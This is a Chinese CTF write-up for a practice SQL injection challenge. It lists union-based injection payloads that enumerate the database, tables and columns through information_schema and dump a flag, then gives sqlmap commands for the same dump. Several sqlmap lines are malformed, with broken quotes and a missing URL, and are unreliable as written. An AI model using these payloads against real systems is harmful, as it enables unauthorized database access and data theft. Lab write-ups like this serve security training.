N1BOOK（第一章 web入门]SQL注入-1）

N1BOOK（第一章 web入门]SQL注入-1）

第一次探索sql注入

1.确定是否存在注入点

1' and 1=2--+

2.确定表的字段多少  确定为三个字段

id=1' order by 5 %23

id=1' order by 3 %23

3.确定回显 为2,3 位

id=1' union select 1,2,3 %23

id=1' union select 1,2,3 limit 1,1 %23

4.确定用户名和 系统版本号 回显：root  ubuntu

id=1' union select 1,user(),version() limit 1,1 %23

5.确定数据库名称 回显：note

id=1' union select 1,2,database() limit 1,1 %23

6.确定元数据库中存在的表 发现两个表，一个是fl4g（大概率）一个是notes

id=1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='note' limit 1,1 %23

7.确定列名:fllllag

id=1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='fl4g' limit 1,1 %23

8.确定用户名及mima（三个字段）

id=1' union select 1,2,group_concat(fllllag) from fl4g limit 1,1 %23

使用sqlmap

1.sqlmap测试是否有注入点：

sqlmap.py -u "URL"

sqlmap -u "-u "URL" --is-dba

sqlmap -u "--is-dba

3.获取当前用户

sqlmap.py -u "URL" --user

sqlmap -u "--user

4.获取站点中所有的数据库

sqlmap.py -u "URL" --dbs

sqlmap -u "--dbs

5.获取当前数据库显示:note

sqlmap.py -u "URL" --current-db

sqlmap -u "b8f52b04e5e0.node4.buuoj.cn:81/index.php?id=1" --current-db

6.获取note数据库中所包含的数据表显示：fl4g

sqlmap.py -u "URL" --tables -D "note"

sqlmap -u "--tables -D "note"

7.获取note数据库的fl4g表中所包含的字段

sqlmap.py -u "URL" --columns -T "fl4g" -D "note"

sqlmap -u "--columns -T "fl4g" -D "note"

8.导出note数据库fl4g表fllllag字段中的数据

sqlmap.py -u "URL" --dump -C "fllllag" -T "fl4g" -D "note"

sqlmap -u "--dump -C "fllllag" -T "fl4g" -D "note"

版权声明：本文内容由网络用户投稿，版权归原作者所有，本站不拥有其著作权，亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容，请联系我们jiasou666@gmail.com 处理，核实后本网站将在24小时内删除侵权内容。